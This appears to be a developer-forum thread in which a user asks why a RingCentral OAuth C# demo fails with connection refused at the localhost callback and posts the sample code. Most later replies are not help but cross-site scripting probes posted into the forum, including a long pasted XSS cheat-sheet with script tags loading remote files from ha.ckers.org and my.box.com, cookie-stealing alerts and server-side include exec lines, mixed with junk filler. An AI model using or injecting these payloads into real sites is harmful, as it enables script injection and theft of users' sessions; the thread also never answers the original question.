
Auth Flow ERR_CONNECTION_REFUSED on localhost

  • April 8, 2020
  • 14 replies
  • 1199 views

Hi. I am trying to run the Authorization Flow demo.

After I enter my username and password, I get a connection refused error. The uri in the browser looks like the following:

http://localhost:5000/oauth2callback?code=U0pDMTFQM

with a long string for code.


Any hints as to where to go next?

14 replies

PhongVu
Community Manager
  • Community Manager
  • April 8, 2020

Can you show how you implemented your code? Take out sensitive information such as your app client ID, secret, etc.


I just copied the C# example from the ringcentral site. The only thing I changed was the Client ID and Secret:


using System.Linq;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Http;
using Microsoft.Extensions.DependencyInjection;
using RingCentral;
using Newtonsoft.Json;
using Microsoft.Extensions.Hosting;

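namespace RCAuthFlowV2
{
    /// <summary>
    /// Single-file ASP.NET Core demo of the RingCentral authorization code flow.
    /// Every request is handled by one terminal middleware that either shows a
    /// login link, completes the OAuth callback, calls a sample API, or logs out.
    /// </summary>
    public class Startup
    {
        // Placeholder credentials. Real values should not be committed or pasted
        // into public posts; load them from configuration or the environment.
        private const string RINGCENTRAL_CLIENT_ID = "XXXXXXXXXX";
        private const string RINGCENTRAL_CLIENT_SECRET = "YYYYYYYYYYYYYYYYYYY";
        private const string RINGCENTRAL_SERVER_URL = "https://platform.devtest.ringcentral.com";

        // The browser is sent to this address after login, so the app must really be
        // listening on this host and port. If nothing listens on localhost:5000 the
        // browser reports a connection-refused error at the callback step.
        // NOTE(review): presumably this must also match the redirect URI registered
        // for the app with RingCentral; confirm in the app settings.
        private const string RINGCENTRAL_REDIRECT_URL = "http://localhost:5000/oauth2callback";

        // Session key under which the serialized token is stored.
        private const string SESSION_TOKEN_KEY = "rc-token";

        // Static markup for the landing page shown once a token is in the session.
        private const string HomePageBody =
            "<b><a href=\"/logout\">Logout</a></b>\n" +
            "<h2>Call APIs</h2>\n" +
            "<ul>\n" +
            "<li><a href=\"/test?api=extension\" target=\"_blank\">Read Extension Info</a></li>\n" +
            "<li><a href=\"/test?api=extension-call-log\" target=\"_blank\">Read Extension Call Log</a></li>\n" +
            "<li><a href=\"/test?api=account-call-log\" target=\"_blank\">Read Account Call Log</a></li>\n" +
            "</ul>";

        /// <summary>Registers MVC with session-backed TempData and the session service.</summary>
        /// <param name="services">The service collection to add registrations to.</param>
        public void ConfigureServices(IServiceCollection services)
        {
            services.AddMvc().AddSessionStateTempDataProvider();
            services.AddSession();
        }

        /// <summary>
        /// Wraps <paramref name="body"/> in a minimal HTML document. The body is
        /// emitted verbatim, so callers must HTML-encode any dynamic value first.
        /// </summary>
        private static string Html(string body)
        {
            return $@"<!doctype html><html><body>{body}</body></html>";
        }

        /// <summary>
        /// Builds the request pipeline: developer exception page in development,
        /// session support, and the terminal handler implementing the demo routes.
        /// </summary>
        /// <param name="app">The application builder for the pipeline.</param>
        /// <param name="env">The hosting environment, used to detect development mode.</param>
        public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
        {
            if (env.IsDevelopment())
            {
                app.UseDeveloperExceptionPage();
            }

            app.UseSession();
            app.Run(async context =>
            {
                var rc = new RestClient(RINGCENTRAL_CLIENT_ID, RINGCENTRAL_CLIENT_SECRET, RINGCENTRAL_SERVER_URL);
                var tokenString = context.Session.GetString(SESSION_TOKEN_KEY);
                if (tokenString != null)
                {
                    // Restore the token saved by a previous /oauth2callback request.
                    rc.token = JsonConvert.DeserializeObject<TokenInfo>(tokenString);
                }
                else if (context.Request.Path != "/oauth2callback")
                {
                    // No token yet and this is not the callback: show the login link.
                    // NOTE(review): the flow sends no OAuth `state` value and the
                    // callback verifies none, so it has no login-CSRF protection.
                    // A production app should bind a random per-session state to the
                    // authorization request and check it on return.
                    // The URI is HTML-encoded because it is placed inside an attribute.
                    var oauthUri = System.Net.WebUtility.HtmlEncode(rc.AuthorizeUri(RINGCENTRAL_REDIRECT_URL));
                    await context.Response.WriteAsync(
                        Html($"<h2>RingCentral Authorization Code Flow Authentication</h2><a href=\"{oauthUri}\">Login RingCentral Account</a>"));
                    return;
                }

                switch (context.Request.Path)
                {
                    case "/":
                        await context.Response.WriteAsync(Html(HomePageBody));
                        break;

                    case "/oauth2callback":
                        // A callback without a usable code is a client error,
                        // not an unhandled exception.
                        context.Request.Query.TryGetValue("code", out var codes);
                        var code = codes.FirstOrDefault();
                        if (string.IsNullOrEmpty(code))
                        {
                            context.Response.StatusCode = 400;
                            await context.Response.WriteAsync(Html("<p>Missing authorization code.</p>"));
                            break;
                        }

                        await rc.Authorize(code, RINGCENTRAL_REDIRECT_URL);
                        context.Session.SetString(SESSION_TOKEN_KEY, JsonConvert.SerializeObject(rc.token));
                        context.Response.Redirect("/");
                        break;

                    case "/test":
                        // The query value only selects one of three fixed endpoints;
                        // it is never used to build the request path.
                        context.Request.Query.TryGetValue("api", out var apis);
                        string endpoint = null;
                        switch (apis.FirstOrDefault())
                        {
                            case "extension":
                                endpoint = "/restapi/v1.0/account/~/extension";
                                break;
                            case "extension-call-log":
                                endpoint = "/restapi/v1.0/account/~/extension/~/call-log";
                                break;
                            case "account-call-log":
                                endpoint = "/restapi/v1.0/account/~/call-log";
                                break;
                        }

                        if (endpoint == null)
                        {
                            context.Response.StatusCode = 400;
                            await context.Response.WriteAsync(Html("<p>Unknown or missing api parameter.</p>"));
                            break;
                        }

                        var result = await rc.Get<string>(endpoint);

                        // The API response can carry account-supplied text, so encode
                        // it before writing it into the page.
                        await context.Response.WriteAsync(
                            Html($"<pre>{System.Net.WebUtility.HtmlEncode(result)}</pre>"));
                        break;

                    case "/logout":
                        // Revoke the token, then drop it from the session.
                        await rc.Revoke();
                        context.Session.Remove(SESSION_TOKEN_KEY);
                        context.Response.Redirect("/");
                        break;

                    default:
                        context.Response.StatusCode = 404;
                        break;
                }
            });
        }
    }
}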



  • Participating Frequently
  • April 9, 2020

ss


  • Participating Frequently
  • April 9, 2020
"/><script>alert(1)</script>

  • Participating Frequently
  • April 9, 2020

'-alert(document.domain)-'&did='-alert(document.domain)-'. [5:21%11PM,%202/29/2020]%joker:%20 javascript:alert("hellox worldss") <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> PT SRC="http://ha.ckers.org/xss.js"> < <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1


  • Participating Frequently
  • April 9, 2020

'-alert(document.domain)-'&did='-alert(document.domain)-'. [5:21%11PM,%202/29/2020]%joker:%20 javascript:alert("hellox worldss") <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> PT SRC="http://ha.ckers.org/xss.js"> < <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1 0&q=';alert(String.fromCharCode(88,83,83))//';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//";alert(String.fromCharCode(88,83,83)%?29//-->">'>&submit-frmGoogleWeb=Web+Search

hellox worldss






...




lol "> "> "> "> <% foo>

LOL LOL <SCRIPT>alert(/XSS/.source)</SCRIPT> ";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <XSS STYLE="behavior: url(xss.htc);"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');" <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@import'javasc ipt:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<A STYLE='noxss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE 
TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? 
echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < x3c x3C u003c u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC="javascript:alert('XSS')" <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <IMG 
SRC=" javascript:alert('XSS');"> perl -e 'print "<SCRIPT>alert("XSS")</SCRIPT>";' > out perl -e 'print "<IMG SRC=javascript:alert("XSS")>";' > out <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="javascript:alert('XSS');"> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> '';!--"<XSS>=&{()} ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} "> < ";alert('XSS');// ¼script¾alert(¢XSS¢)¼/script¾
exp/* a="get";b="URL(ja"";c="vascr";d="ipt:ale";e="rt('XSS');")";eval(a+b+c+d+e); PT SRC="http://ha.ckers.org/xss.js"> TESTHTML5FORMACTION crosssitespt "> "> "> ;1 +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “> “>< foo %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo’; alert(document.cookie);//’; "> ]> &file; 40404 123 a username: csrf_test password: Qwer@123

  • Participating Frequently
  • April 9, 2020

ddddddddddddddddddddddddddddddddddd


  • Participating Frequently
  • April 9, 2020

<"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>


  • Participating Frequently
  • April 9, 2020

">


  • Participating Frequently
  • April 9, 2020

sdfsdfsfsdfs


  • Participating Frequently
  • April 9, 2020

">')" />


  • Participating Frequently
  • April 9, 2020

fffffffffffffffffffffffffffffffffffffffffffffff


  • Participating Frequently
  • April 9, 2020

cccccccccccccccccccccccccc


  • Participating Frequently
  • April 9, 2020

xxxxxxxxxxxxxxxx